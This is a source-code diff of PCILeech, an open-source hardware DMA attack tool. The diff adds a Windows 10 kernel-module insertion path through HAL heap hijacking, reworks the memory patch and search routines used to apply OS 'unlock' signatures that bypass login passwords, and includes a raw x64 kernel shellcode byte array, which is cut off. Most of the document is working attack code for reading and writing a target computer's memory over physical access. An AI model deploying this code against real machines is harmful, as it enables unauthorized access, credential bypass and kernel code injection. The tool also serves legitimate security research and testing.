+	if(!KMD_IsRangeInPhysicalMap(phKMD, qwAddress, cb) && !pDeviceData->IsAllowedAccessReservedAddress) { return E_FAIL; }
 	result = DeviceWriteDMA(pDeviceData, (DWORD)phKMD->status->DMAAddrPhysical, pb, cb);
 	if(!result) { return FALSE; }
 	phKMD->status->_size = cb;
@@ -774,9 +909,11 @@ BOOL KMDOpen(_In_ PCONFIG pCfg, _In_ PDEVICE_DATA pDeviceData)
 	if(pCfg->qwKMD) {
 		return KMDOpen_LoadExisting(pCfg, pDeviceData);
 	} else if(pCfg->qwCR3 || pCfg->fPageTableScan) {
-		return KMDOpen_PageTableHijack(pCfg, pDeviceData); // TODO: FIX HRESULT
+		return KMDOpen_PageTableHijack(pCfg, pDeviceData);
+	} else if(0 == _stricmp(pCfg->szKMDName, "WIN10_X64")) {
+		return KMDOpen_HalHeapHijack(pCfg, pDeviceData);
 	} else {
-		return KMDOpen_MemoryScan(pCfg, pDeviceData); // TODO: FIX HRESULT
+		return KMDOpen_MemoryScan(pCfg, pDeviceData);
 	}
 }
 
diff --git a/pcileech/memdump.c b/pcileech/memdump.c
index ae947d0..134d16c 100644
--- a/pcileech/memdump.c
+++ b/pcileech/memdump.c
@@ -22,62 +22,6 @@ VOID MemoryDump_FileWriteAsync_Thread(PFILE_WRITE_ASYNC_BUFFER pfb)
 	pfb->isExecuting = FALSE;
 }
 
-VOID MemoryDump_Read1M(_In_ PCONFIG pCfg, _In_ PDEVICE_DATA pDeviceData, _Out_ PBYTE pbBuffer1M, _In_ QWORD qwBaseAddress, _Inout_ PPAGE_STATISTICS pPageStat)
-{
-	QWORD o, p;
-	// try read 1M in 128k chunks
-	for(o = 0; o < 0x00100000; o += 0x00020000) {
-		if((qwBaseAddress + o + 0x00020000 <= pCfg->qwAddrMax) && DeviceReadMEM(pDeviceData, qwBaseAddress + o, pbBuffer1M + o, 0x00020000)) {
-			pPageStat->cPageSuccess += 32;
-		} else {
-			// try read 128k in 4k (page) chunks
-			for(p = 0; p < 0x00020000; p += 0x1000) {
-				if(!(qwBaseAddress + o + p + 0x1000 <= pCfg->qwAddrMax)) {
-					return;
-				}
-				if(DeviceReadMEM(pDeviceData, qwBaseAddress + o + p, pbBuffer1M + o + p, 0x1000)) {
-					pPageStat->cPageSuccess++;
-				} else {
-					pPageStat->cPageFail++;
-				}
-			}
-		}
-	}
-}
-
-BOOL MemoryDump_Read16M(_In_ PCONFIG pCfg, _In_ PDEVICE_DATA pDeviceData, _Out_ PBYTE pbBuffer16M, _In_ QWORD qwBaseAddress, _Inout_ PPAGE_STATISTICS pPageStat)
-{
-	BOOL isSuccess[4] = { FALSE, FALSE, FALSE, FALSE };
-	QWORD i, o, qwOffset;
-	// try read 16M
-	if((qwBaseAddress + 0x01000000 <= pCfg->qwAddrMax) && DeviceReadMEM(pDeviceData, qwBaseAddress, pbBuffer16M, 0x01000000)) {
-		pPageStat->cPageSuccess += 4096;
-		return TRUE;
-	}
-	// try read 16M in 4M chunks
-	for(i = 0; i < 4; i++) {
-		o = 0x00400000 * i;
-		isSuccess[i] = (qwBaseAddress + o + 0x00400000 <= pCfg->qwAddrMax) && DeviceReadMEM(pDeviceData, qwBaseAddress + o, pbBuffer16M + o, 0x00400000);
-	}
-	// DMA mode + all memory inside scope + and all 4M reads fail => fail
-	if(!pDeviceData->KMDHandle && qwBaseAddress + 0x01000000 <= pCfg->qwAddrMax && !isSuccess[0] && !isSuccess[1] && !isSuccess[2] && !isSuccess[3]) {
-		pPageStat->cPageFail += 4096;
-		return FALSE;
-	}
-	// try read failed 4M chunks in 1M chunks
-	for(i = 0; i < 4; i++) {
-		if(isSuccess[i]) {
-			pPageStat->cPageSuccess += 1024;
-		} else {
-			qwOffset = 0x00400000 * i;
-			for(o = 0; o < 0x00400000; o += 0x00100000) {
-				MemoryDump_Read1M(pCfg, pDeviceData, pbBuffer16M + qwOffset + o, qwBaseAddress + qwOffset + o, pPageStat);
-			}
-		}
-	}
-	return TRUE;
-}
-
 VOID MemoryDump_SetOutFileName(_Inout_ PCONFIG pCfg)
 {
 	SYSTEMTIME st;
@@ -130,7 +74,7 @@ VOID ActionMemoryDump(_In_ PCONFIG pCfg, _In_ PDEVICE_DATA pDeviceData)
 	// 2: start dump in 16MB blocks
 	qwCurrentAddress = pCfg->qwAddrMin;
 	while(qwCurrentAddress < pCfg->qwAddrMax) {
-		result = MemoryDump_Read16M(pCfg, pDeviceData, pbMemoryDump, qwCurrentAddress, &pageStat);
+		result = Util_Read16M(pCfg, pDeviceData, pbMemoryDump, qwCurrentAddress, &pageStat);
 		ShowUpdatePageRead(pCfg, qwCurrentAddress, &pageStat);
 		if(!result) {
 			printf("Memory Dump: Failed. Cannot dump any sequential data in 16MB - terminating.\n");
diff --git a/pcileech/mempatch.c b/pcileech/mempatch.c
index 5c7c823..22b075f 100644
--- a/pcileech/mempatch.c
+++ b/pcileech/mempatch.c
@@ -7,78 +7,144 @@
 #include "device.h"
 #include "util.h"
 
-HRESULT Patch_FindAndPatch(_Inout_ PBYTE pbPages, _In_ DWORD cPages, _In_ PSIGNATURE pSignatures, _In_ DWORD cSignatures, _Out_ PDWORD pdwPgIdx)
+BOOL Patch_CmpChunk(_In_ PBYTE pbPage, _In_ PSIGNATURE_CHUNK pChunk, _In_opt_ DWORD dwRelBase, _Out_opt_ PDWORD pdwOffset)
 {
-	PBYTE pb;
-	DWORD pgIdx, i;
-	PSIGNATURE ps;
-	for(pgIdx = 0; pgIdx < cPages; pgIdx++) {
-		pb = pbPages + (4096 * pgIdx);
-		for(i = 0; i < cSignatures; i++) {
-			ps = pSignatures + i;
-			if(!ps->chunk[0].cb || memcmp(pb + ps->chunk[0].cbOffset, ps->chunk[0].pb, ps->chunk[0].cb)) {
-				continue;
-			}
-			if(ps->chunk[1].cb && memcmp(pb + ps->chunk[1].cbOffset, ps->chunk[1].pb, ps->chunk[1].cb)) {
-				continue;
-			}
-			memcpy(pb + ps->chunk[2].cbOffset, ps->chunk[2].pb, ps->chunk[2].cb);
-			*pdwPgIdx = pgIdx;
-			return S_OK;
+	DWORD o;
+	if(pChunk->tpOffset == SIGNATURE_CHUNK_TP_OFFSET_FIXED) {
+		if(pChunk->cbOffset + pChunk->cb > 0x1000) { return FALSE; }
+		if(0 == memcmp(pbPage + pChunk->cbOffset, pChunk->pb, pChunk->cb)) {
+			if(pdwOffset) { *pdwOffset = pChunk->cbOffset; }
+			return TRUE;
 		}
 	}
-	return E_FAIL;
+	if(pChunk->tpOffset == SIGNATURE_CHUNK_TP_OFFSET_RELATIVE) {
+		if(pChunk->cbOffset + dwRelBase + pChunk->cb > 0x1000) { return FALSE; }
+		if(0 == memcmp(pbPage + dwRelBase + pChunk->cbOffset, pChunk->pb, pChunk->cb)) {
+			if(pdwOffset) { *pdwOffset = dwRelBase + pChunk->cbOffset; }
+			return TRUE;
+		}
+	}
+	if(pChunk->tpOffset == SIGNATURE_CHUNK_TP_OFFSET_ANY) {
+		for(o = 0; o <= 0x1000 - pChunk->cb; o++) {
+			// comparison - extra "unnecessary" dword comparison for speedup reasons.
+			if(((pChunk->cb < sizeof(DWORD)) || (*(PDWORD)pChunk->pb == *(PDWORD)(pbPage + o))) &&
+				(0 == memcmp(pbPage + o, pChunk->pb, pChunk->cb))) {
+				if(pdwOffset) { *pdwOffset = o; }
+				return TRUE;
+			}
+		}
+	}
+	return FALSE;
 }
 
-VOID ActionPatch(_In_ PCONFIG pCfg, _In_ PDEVICE_DATA pDeviceData)
+BOOL Patch_FindAndPatch(_Inout_ PBYTE pbPage, _In_ PSIGNATURE pSignatures, _In_ DWORD cSignatures, _Out_ PDWORD pdwPatchOffset, _Out_ PDWORD pcbPatch)
+{
+	DWORD i, o, dwRelBase;
+	PSIGNATURE ps;
+	for(i = 0; i < cSignatures; i++) {
+		ps = pSignatures + i;
+		if(!ps->chunk[0].cb || !Patch_CmpChunk(pbPage, &ps->chunk[0], 0, &dwRelBase)) {
+			continue;
+		}
+		if(ps->chunk[1].cb && !Patch_CmpChunk(pbPage, &ps->chunk[1], dwRelBase, NULL)) {
+			continue;
+		}
+		o = ps->chunk[2].cbOffset;
+		if(ps->chunk[2].tpOffset == SIGNATURE_CHUNK_TP_OFFSET_RELATIVE) { 
+			o += dwRelBase;
+		}
+		if(o + ps->chunk[2].cb < 0x1000) {
+			memcpy(pbPage + o, ps->chunk[2].pb, ps->chunk[2].cb);
+			*pdwPatchOffset = o;
+			*pcbPatch = ps->chunk[2].cb;
+			return TRUE;
+		}
+	}
+	return FALSE;
+}
+
+#define MAX_NUM_PATCH_LOCATIONS		0x100
+
+VOID ActionPatchAndSearch(_In_ PCONFIG pCfg, _In_ PDEVICE_DATA pDeviceData)
 {
 	SIGNATURE oSignatures[CONFIG_MAX_SIGNATURES];
-	DWORD pgIdx, cSignatures = CONFIG_MAX_SIGNATURES;
-	QWORD qwAddrCurrent;
+	DWORD dwoPatch, cbPatch, cSignatures = CONFIG_MAX_SIGNATURES;
+	QWORD qwAddrBase;
 	PBYTE pbBuffer16M = LocalAlloc(0, 0x01000000);
-	BOOL result;
-	HRESULT hr;
 	PAGE_STATISTICS pageStat;
-	// initialize / allocate memory / load signatures
-	qwAddrCurrent = pCfg->qwAddrMin ? pCfg->qwAddrMin : 0x100000; // no signature below 1MB
+	BOOL result, isModePatch = pCfg->tpAction == PATCH;
+	LPSTR szAction = isModePatch ? "Patch" : "Search";
+	QWORD i, qwoPages, qwPatchList[MAX_NUM_PATCH_LOCATIONS], cPatchList = 0;
+	// initialize / allocate memory
+	qwAddrBase = pCfg->qwAddrMin;
 	if(!pbBuffer16M) { return; }
 	memset(&pageStat, 0, sizeof(PAGE_STATISTICS));
-	pageStat.cPageTotal = (pCfg->qwAddrMax - qwAddrCurrent + 1) / 4096;
+	pageStat.cPageTotal = (pCfg->qwAddrMax - qwAddrBase + 1) / 4096;
 	if(!pageStat.cPageTotal) {
-		printf("Patch: Failed. Zero or negative memory range specified.\n");
+		printf("%s: Failed. Zero or negative memory range specified.\n", szAction);
 		goto cleanup;
 	}
 	pageStat.isAccessModeKMD = pDeviceData->KMDHandle ? TRUE : FALSE;
-	pageStat.szCurrentAction = "Patching";
+	pageStat.szCurrentAction = isModePatch ? "Patching" : "Searching";
 	pageStat.qwTickCountStart = GetTickCount64();
-	result = Util_LoadSignatures(pCfg->szSignatureName, ".sig", oSignatures, &cSignatures, 3);
-	if(!result || !cSignatures) {
-		printf("Patch: Failed. Failed to load signature.\n");
-		goto cleanup;
+	// load and verify signatures
+	if(pCfg->cbIn) {
+		Util_CreateSignatureSearchAll(pCfg->pbIn, (DWORD)pCfg->cbIn, oSignatures);
+		cSignatures = 1;
+	} else {
+		result = Util_LoadSignatures(pCfg->szSignatureName, ".sig", oSignatures, &cSignatures, 3);
+		if(!result || !cSignatures) {
+			printf("%s: Failed. Failed to load signature.\n", szAction);
+			goto cleanup;
+		}
+	}
+	if(isModePatch) {
+		for(i = 0; i < cSignatures; i++) {
+			if(oSignatures[i].chunk[2].cb == 0 || oSignatures[i].chunk[2].cb > 4096 || oSignatures[i].chunk[2].tpOffset == SIGNATURE_CHUNK_TP_OFFSET_ANY) {
+				printf("%s: Failed. Invalid patch signature.\n", szAction);
+			}
+		}
 	}
 	// loop patch / unlock
-	while(qwAddrCurrent < pCfg->qwAddrMax) {
-		result = DeviceReadMEM(pDeviceData, qwAddrCurrent, pbBuffer16M, 0x01000000);
-		if(result) {
-			pageStat.cPageSuccess += 4096;
-			ShowUpdatePageRead(pCfg, qwAddrCurrent, &pageStat);
-			hr = Patch_FindAndPatch(pbBuffer16M, 4096, oSignatures, cSignatures, &pgIdx);
-			if(SUCCEEDED(hr)) {
-				result = DeviceWriteMEM(pDeviceData, qwAddrCurrent + 4096 * pgIdx, pbBuffer16M + 4096 * pgIdx, 4096);
-				if(result) {
-					printf("Patch: Successful.\n You may enter any password to log on if an unlock signature was used.\n");
-				} else {
-					printf("Patch: Failed. Write memory failed.\n");
+	for(; qwAddrBase < pCfg->qwAddrMax; qwAddrBase += 0x01000000) {
+		result = Util_Read16M(pCfg, pDeviceData, pbBuffer16M, qwAddrBase, &pageStat);
+		ShowUpdatePageRead(pCfg, qwAddrBase, &pageStat);
+		if(!result) {
+			printf("%s: Failed. Cannot dump any sequential data in 16MB - terminating.\n", szAction);
+			goto cleanup;
+		}
+		for(qwoPages = 0; (qwoPages < 0x01000000) && (qwAddrBase + qwoPages < pCfg->qwAddrMax); qwoPages += 0x1000) {
+			result = Patch_FindAndPatch(pbBuffer16M + qwoPages, oSignatures, cSignatures, &dwoPatch, &cbPatch);
+			if(!result) {
+				continue;
+			}
+			if(isModePatch) {
+				result = DeviceWriteMEM(pDeviceData, qwAddrBase + qwoPages + dwoPatch, pbBuffer16M + qwoPages + dwoPatch, cbPatch);
+			}
+			if(result) {
+				if(cPatchList == MAX_NUM_PATCH_LOCATIONS) {
+					printf("%s: Failed. More than %i signatures found. Location: 0x%llx\n", szAction, MAX_NUM_PATCH_LOCATIONS, qwAddrBase + qwoPages + dwoPatch);
+					goto cleanup;
 				}
+				qwPatchList[cPatchList] = qwAddrBase + qwoPages + dwoPatch;
+				cPatchList++;
+			} else {
+				printf("%s: Failed. Write memory failed. Location: 0x%llx\n", szAction, qwAddrBase + qwoPages + dwoPatch);
+				goto cleanup;
+			}
+			if(!pCfg->fPatchAll) {
 				goto cleanup;
 			}
-		} else {
-			pageStat.cPageFail += 4096;
-			ShowUpdatePageRead(pCfg, qwAddrCurrent, &pageStat);
 		}
-		qwAddrCurrent += 0x01000000;
 	}
-	printf("Patch: Failed.\n");
+	if(0 == cPatchList) {
+		printf("%s: Failed. No signature found.\n", szAction);
+	}
 cleanup:
+	if(cPatchList) {
+		for(i = 0; i < cPatchList; i++) {
+			printf("%s: Successful. Location: 0x%llx\n", szAction, qwPatchList[i]);
+		}
+	}
 	LocalFree(pbBuffer16M);
-}
\ No newline at end of file
+}
diff --git a/pcileech/mempatch.h b/pcileech/mempatch.h
index a6c8071..d9bfe9b 100644
--- a/pcileech/mempatch.h
+++ b/pcileech/mempatch.h
@@ -8,11 +8,11 @@
 #include "pcileech.h"
 
 /*
-* Patch the memory of the target system. This includes the unlock
-* operating system functionality (remove password requirement).
+* Patch the memory of the target system. Alternatively search the memory of the
+* target system. This includes the unlock operating system functionality.
 * -- pCfg
 * -- pDeviceData
 */
-VOID ActionPatch(_In_ PCONFIG pCfg, _In_ PDEVICE_DATA pDeviceData);
+VOID ActionPatchAndSearch(_In_ PCONFIG pCfg, _In_ PDEVICE_DATA pDeviceData);
 
 #endif /* __MEMPATCH_H__ */
\ No newline at end of file
diff --git a/pcileech/pcileech.c b/pcileech/pcileech.c
index cfbe944..9539002 100644
--- a/pcileech/pcileech.c
+++ b/pcileech/pcileech.c
@@ -6,6 +6,7 @@
 #include "pcileech.h"
 #include "cpuflash.h"
 #include "device.h"
+#include "help.h"
 #include "memdump.h"
 #include "mempatch.h"
 #include "util.h"
@@ -48,127 +49,6 @@ VOID ShowUpdatePageRead(_In_ PCONFIG pCfg, _In_ QWORD qwCurrentAddress, _Inout_
 		qwPercentFail);
 }
 
-VOID ShowListFiles(_In_ LPSTR szSearchPattern)
-{
-	WIN32_FIND_DATAA data;
-	HANDLE h;
-	CHAR szSearch[MAX_PATH];
-	Util_GetFileInDirectory(szSearch, szSearchPattern);
-	h = FindFirstFileA(szSearch, &data);
-	while(h != INVALID_HANDLE_VALUE) {
-		data.cFileName[strlen(data.cFileName) - 4] = 0;
-		printf("             %s\n", data.cFileName);
-		if(!FindNextFileA(h, &data)) {
-			return; 
-		}
-	}
-}
-
-VOID ShowHelp()
-{
-	printf(
-		" PCILEECH COMMAND LINE REFERENCE                                               \n" \
-		" PCILeech can run in two modes - DMA (default) and Kernel Module Assisted (KMD)\n" \
-		" KMD mode may be triggered by supplying the option kmd and optionally cr3 / pt.\n" \
-		" If an address is supplied in the kmd option pcileech will use the already ins-\n" \
-		" erted KMD. The already inserted KMD will be left intact upon exit.  If the KMD\n" \
-		" contains a kernel mode signature the kernel module will be loaded and then un-\n" \
-		" loaded on program exit ( except for the kmdload command ).                    \n" \
-		" KMD mode may access all memory. DMA mode may only access memory below 4GB.    \n" \
-		" General syntax: pcileech.exe <command> [-<optionname1> <optionvalue1>] ...    \n" \
-		" Valid commands and valid MODEs [ and options ]:                               \n" \
-		"   info                   DMA,KMD                                              \n" \
-		"   dump                   DMA,KMD   [ min, max, out ]                          \n" \
-		"   patch                  DMA,KMD   [ min, max, sig ]                          \n" \
-		"   write                  DMA,KMD   [ min, in ]                                \n" \
-		"   [command_module]           KMD   [ in, out, s, 0..9 ]                       \n" \
-		"   kmdload                DMA       [ pt, cr3 ]                                \n" \
-		"   kmdexit                    KMD                                              \n" \
-		"   8051start              DMA,KMD   [ in ]                                     \n" \
-		"   8051stop               DMA,KMD                                              \n" \
-		"   flash                  DMA,KMD   [ in ]                                     \n" \
-		"   pagedisplay            DMA,KMD   [ min ]                                    \n" \
-		"   testmemread            DMA       [ min ]                                    \n" \
-		"   testmemreadwrite       DMA       [ min ]                                    \n" \
-		" Valid options:                                                                \n" \
-		"   -min : memory min address, valid range: 0x0..0xffffffffffffffff             \n" \
-		"          default: 0x0                                                         \n" \
-		"          For memory accesses over 0xffffffff KMD must be loaded.              \n" \
-		"          note that the address must be given in hexadecimal format.           \n" \
-		"   -max : memory max address, valid range: 0x0..0xffffffffffffffff             \n" \
-		"          default: 0xffffffff (4GB) in standard mode                           \n" \
-		"          default: actual memory size in KMD mode                              \n" \
-		"          For memory accesses over 0xffffffff KMD must be loaded.              \n" \
-		"          note that the address must be given in hexadecimal format.           \n" \
-		"   -out : name of output file.                                                 \n" \
-		"          default: pcileech-<minaddr>-<maxaddr>-<date>-<time>.raw              \n" \
-		"   -in  : file name or hexstring to load as input.                             \n" \
-		"          Examples: -in 0102030405060708090a0b0c0d0e0f or -in firmware.bin     \n" \
-		"   -s   : string input value.                                                  \n" \
-		"          Example: -s \"\\\\??\\C:\\Windows\\System32\\cmd.exe\"               \n" \
-		"   -0..9: QWORD input value. Example: -0 0xff , -3 0x7fffffff00001000 or -2 13 \n" \
-		"          default: 0                                                           \n" \
-		"   -pt  : trigger KMD insertion by automatic page table hijack.                \n" \
-		"          Option has no value. Example: -pt                                    \n" \
-		"          Only used in conjunction with -kmd option to trigger KMD insertion   \n" \
-		"          by page table hijack. Only recommended to use with care on computers \n" \
-		"          with 4GB+ RAM when kernel is located in high-memory (Windows 10).    \n" \
-		"          Insertion may trigger system crash unless signature exactly matches. \n" \
-		"   -cr3 : base address of system page table / CR3 CPU register.                \n" \
-		"          Valid range: 0x00..0xfffff000                                        \n" \
-		"          Insertion may trigger system crash unless signature exactly matches. \n" \
-		"   -kmd : address of already loaded kernel module helper (KMD).                \n" \
-		"          ALTERNATIVELY                                                        \n" \
-		"          kernel module to use, see list below for choices:                    \n" \
-		"             LINUX_X64                                                         \n" \
-		"             OSX_X64                                                           \n" \
-		);
-	ShowListFiles("*.kmd");
-	printf(
-		"   -sig : available patches - including operating system unlock patches:       \n");
-	ShowListFiles("*.sig");
-	printf(
-		" Available command modules:                                                    \n");
-	ShowListFiles("*.ksh");
-	printf("\n");
-}
-
-VOID ShowInfo()
-{
-	printf(
-		" PCILEECH INFORMATION                                                          \n" \
-		" PCILeech (c) 2016 Ulf Frisk                                                   \n" \
-		" Version: 1.0 - DEF CON EDITION                                                \n" \
-		" License: GNU GENERAL PUBLIC LICENSE - Version 3, 29 June 2007                 \n" \
-		" Contact information: pcileech@frizk.net                                       \n" \
-		" System requirements: 64-bit Windows 7, 10 or later.                           \n" \
-		" Other project references:                                                     \n" \
-		"   PCILeech          - https://github.com/ufrisk/pcileech                      \n" \
-		"   Slotscreamer      - https://github.com/NSAPlayset/SLOTSCREAMER              \n" \
-		"   Inception         - https://github.com/carmaa/inception                     \n" \
-		"   Google USB driver - http://developer.android.com/sdk/win-usb.html#download  \n" \
-		" ----------------                                                              \n" \
-		" Use with USB3380 hardware programmed as a pcileech device only.               \n" \
-		" Use with USB2 or USB3. USB3 is strongly recommended performance wise.         \n\n" \
-		" ----------------                                                              \n" \
-		" Driver information:                                                           \n" \
-		" The pcileech requires a dummy driver to function properly. The pcileech       \n" \
-		" device masks as a Google Glass. Please download and install the Google USB    \n" \
-		" driver before proceeding.                                                     \n" \
-		" ----------------                                                              \n" \
-		" Usage: connect USB3380 device to target computer and USB cable to the computer\n" \
-		" executing pcileech.exe.  If all memory reads fail try to re-insert the device.\n" \
-		" - It is only possible to access the lower 4GB of RAM (32-bit) with DMA.       \n" \
-		" - It may not be possible to access RAM if OS configured IOMMU (VT-d).         \n" \
-		"   OS X defaults to VT-d. Windows 10 may, if configured, also use VT-d.        \n" \
-		" - No drivers are needed on the target! Memory acquisition is all in hardware! \n" \
-		" - Confirmed working with PCIe/mPCIe/ExpressCard/Thunderbolt.                  \n" \
-		" - If kernel module is successfully inserted in lower 4GB RAM more RAM will be \n" \
-		"   possible to read. Extended funtionality will also be made available.        \n" \
-		" ----------------                                                              \n" );
-	ShowHelp();
-}
-
 HRESULT ParseCmdLine(_In_ DWORD argc, _In_ char* argv[], _Out_ PCONFIG pCfg)
 {
 	struct ACTION {
@@ -180,6 +60,7 @@ HRESULT ParseCmdLine(_In_ DWORD argc, _In_ char* argv[], _Out_ PCONFIG pCfg)
 		{.tp = DUMP,.sz = "dump" },
 		{.tp = WRITE,.sz = "write" },
 		{.tp = PATCH,.sz = "patch" },
+		{.tp = SEARCH,.sz = "search" },
 		{.tp = KMDLOAD,.sz = "kmdload" },
 		{.tp = KMDEXIT,.sz = "kmdexit" },
 		{.tp = FLASH,.sz = "flash" },
@@ -218,6 +99,18 @@ HRESULT ParseCmdLine(_In_ DWORD argc, _In_ char* argv[], _Out_ PCONFIG pCfg)
 			pCfg->fPageTableScan = TRUE;
 			i++;
 			continue;
+		} else if(0 == strcmp(argv[i], "-all")) {
+			pCfg->fPatchAll = TRUE;
+			i++;
+			continue;
+		} else if(0 == strcmp(argv[i], "-force")) {
+			pCfg->fForceRW = TRUE;
+			i++;
+			continue;
+		} else if(0 == strcmp(argv[i], "-help")) {
+			pCfg->fShowHelp = TRUE;
+			i++;
+			continue;
 		} else if(i + 1 >= argc) {
 			return E_FAIL;
 		} else if(0 == strcmp(argv[i], "-min")) {
@@ -277,19 +170,23 @@ int main(_In_ int argc, _In_ char* argv[])
 	}
 	hr = ParseCmdLine((DWORD)argc, argv, pCfg);
 	if(FAILED(hr)) {
-		ShowHelp();
+		Help_ShowGeneral();
 		return 1;
 	}
 	if(pCfg->tpAction == EXEC && !Util_LoadKmdExecShellcode(pCfg->szShellcodeName, &pKmdExec)) {
 		LocalFree(pKmdExec);
-		ShowHelp();
+		Help_ShowGeneral();
 		return 1;
 	}
 	if(pCfg->tpAction == INFO) {
-		ShowInfo();
+		Help_ShowInfo();
 		return 0;
 	}
-	result = DeviceOpen(&device);
+	if(pCfg->fShowHelp) {
+		Help_ShowDetailed(pCfg);
+		return 0;
+	}
+	result = DeviceOpen(pCfg, &device);
 	if(!result) {
 		printf("PCILEECH: Failed to connect to USB device.\n");
 		return 1;
@@ -308,7 +205,9 @@ int main(_In_ int argc, _In_ char* argv[])
 	} else if(pCfg->tpAction == PAGEDISPLAY) {
 		ActionMemoryPageDisplay(pCfg, &device);
 	} else if(pCfg->tpAction == PATCH) {
-		ActionPatch(pCfg, &device);
+		ActionPatchAndSearch(pCfg, &device);
+	} else if(pCfg->tpAction == SEARCH) {
+		ActionPatchAndSearch(pCfg, &device);
 	} else if(pCfg->tpAction == FLASH) {
 		ActionFlash(pCfg, &device);
 	} else if(pCfg->tpAction == START8051) {
@@ -329,7 +228,7 @@ int main(_In_ int argc, _In_ char* argv[])
 		if(device.KMDHandle) {
 			KMDClose(&device);
 			printf("KMD: Hopefully unloaded.\n");
-		}
+		} 
 		else {
 			printf("KMD: Failed. Cannot unload KMD - not found!.\n");
 		}
diff --git a/pcileech/pcileech.h b/pcileech/pcileech.h
index ec55526..a050341 100644
--- a/pcileech/pcileech.h
+++ b/pcileech/pcileech.h
@@ -28,6 +28,7 @@ DEFINE_GUID(GUID_DEVINTERFACE_android, 0xF72FE0D4, 0xCBCB, 0x407d, 0x88, 0x14, 0
 typedef struct _DEVICE_DATA {
 	BOOL HandlesOpen;
 	BOOL IsAllowedMultiThreadDMA;
+	BOOL IsAllowedAccessReservedAddress;
 	WINUSB_INTERFACE_HANDLE WinusbHandle;
 	HANDLE DeviceHandle;
 	WCHAR DevicePath[MAX_PATH];
@@ -63,6 +64,7 @@ typedef enum tdActionType {
 	DUMP,
 	WRITE,
 	PATCH,
+	SEARCH,
 	FLASH,
 	START8051,
 	STOP8051,
@@ -91,6 +93,9 @@ typedef struct tdConfig {
 	CHAR szShellcodeName[MAX_PATH];
 	BOOL fPageStat;
 	BOOL fPageTableScan;
+	BOOL fPatchAll;
+	BOOL fForceRW;
+	BOOL fShowHelp;
 } CONFIG, *PCONFIG;
 
 typedef struct tdPageStatistics {
@@ -102,10 +107,14 @@ typedef struct tdPageStatistics {
 	LPSTR szCurrentAction;
 } PAGE_STATISTICS, *PPAGE_STATISTICS;
 
+#define SIGNATURE_CHUNK_TP_OFFSET_FIXED		0
+#define SIGNATURE_CHUNK_TP_OFFSET_RELATIVE	1
+#define SIGNATURE_CHUNK_TP_OFFSET_ANY		2
 typedef struct tdSignatureChunk {
 	QWORD qwAddress;
 	DWORD cbOffset;
 	DWORD cb;
+	BYTE tpOffset;
 	BYTE pb[4096];
 } SIGNATURE_CHUNK, *PSIGNATURE_CHUNK;
 
diff --git a/pcileech/pcileech.vcxproj b/pcileech/pcileech.vcxproj
index 1c94878..f75d0fa 100644
--- a/pcileech/pcileech.vcxproj
+++ b/pcileech/pcileech.vcxproj
@@ -84,6 +84,7 @@
     <ClInclude Include="consoleredir.h" />
     <ClInclude Include="cpuflash.h" />
     <ClInclude Include="device.h" />
+    <ClInclude Include="help.h" />
     <ClInclude Include="kmd.h" />
     <ClInclude Include="memdump.h" />
     <ClInclude Include="mempatch.h" />
@@ -95,6 +96,7 @@
     <ClCompile Include="consoleredir.c" />
     <ClCompile Include="cpuflash.c" />
     <ClCompile Include="device.c" />
+    <ClCompile Include="help.c" />
     <ClCompile Include="kmd.c" />
     <ClCompile Include="memdump.c" />
     <ClCompile Include="mempatch.c" />
diff --git a/pcileech/pcileech.vcxproj.filters b/pcileech/pcileech.vcxproj.filters
index 06e3edb..58ee7ec 100644
--- a/pcileech/pcileech.vcxproj.filters
+++ b/pcileech/pcileech.vcxproj.filters
@@ -42,6 +42,9 @@
     <ClInclude Include="mempatch.h">
       <Filter>Header Files</Filter>
     </ClInclude>
+    <ClInclude Include="help.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
   </ItemGroup>
   <ItemGroup>
     <ClCompile Include="consoleredir.c">
@@ -68,5 +71,8 @@
     <ClCompile Include="mempatch.c">
       <Filter>Source Files</Filter>
     </ClCompile>
+    <ClCompile Include="help.c">
+      <Filter>Source Files</Filter>
+    </ClCompile>
   </ItemGroup>
 </Project>
\ No newline at end of file
diff --git a/pcileech/shellcode.h b/pcileech/shellcode.h
index 62201b7..6318340 100644
--- a/pcileech/shellcode.h
+++ b/pcileech/shellcode.h
@@ -148,6 +148,52 @@ const BYTE WINX64_STAGE3_BIN[] = {
 	0x48, 0x83, 0xc4, 0x20, 0x41, 0x5e, 0xc3
 };
 
+const BYTE WINX64_STAGE2_HAL_BIN[] = {
+	0xeb, 0x16, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+	0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0x53, 0x56, 0x57, 0x41, 0x52, 0x41,
+	0x53, 0x41, 0x54, 0x41, 0x55, 0x48, 0x83, 0xec, 0x20, 0x0f, 0x01, 0x0c,
+	0x24, 0x48, 0x8b, 0x4c, 0x24, 0x02, 0x48, 0x8b, 0x49, 0x04, 0xe8, 0x3a,
+	0x01, 0x00, 0x00, 0x4c, 0x8b, 0xe0, 0x49, 0x8b, 0xcc, 0xba, 0xce, 0xad,
+	0x90, 0x4d, 0xe8, 0x5d, 0x01, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x85, 0xc0,
+	0x0f, 0x85, 0xe4, 0x00, 0x00, 0x00, 0xb0, 0x00, 0xb2, 0x01, 0xf0, 0x0f,
+	0xb0, 0x15, 0x9c, 0xff, 0xff, 0xff, 0x0f, 0x85, 0xd2, 0x00, 0x00, 0x00,
+	0x48, 0x8b, 0x05, 0x9d, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x0d, 0x8e, 0xff,
+	0xff, 0xff, 0x48, 0x89, 0x08, 0xc6, 0x05, 0x7f, 0xff, 0xff, 0xff, 0x0d,
+	0x49, 0x8b, 0xcc, 0xba, 0xbc, 0x1e, 0x36, 0x9f, 0xe8, 0x1b, 0x01, 0x00,
+	0x00, 0x48, 0xc7, 0xc1, 0x00, 0x20, 0x00, 0x00, 0x48, 0xc7, 0xc2, 0xff,
+	0xff, 0xff, 0x7f, 0xff, 0xd0, 0x4c, 0x8b, 0xe8, 0x48, 0x33, 0xc0, 0xb9,
+	0x00, 0x04, 0x00, 0x00, 0xff, 0xc9, 0x49, 0x89, 0x44, 0xcd, 0x00, 0x75,
+	0xf7, 0x4d, 0x89, 0x65, 0x08, 0x48, 0xb8, 0x48, 0x8d, 0x05, 0xf1, 0xff,
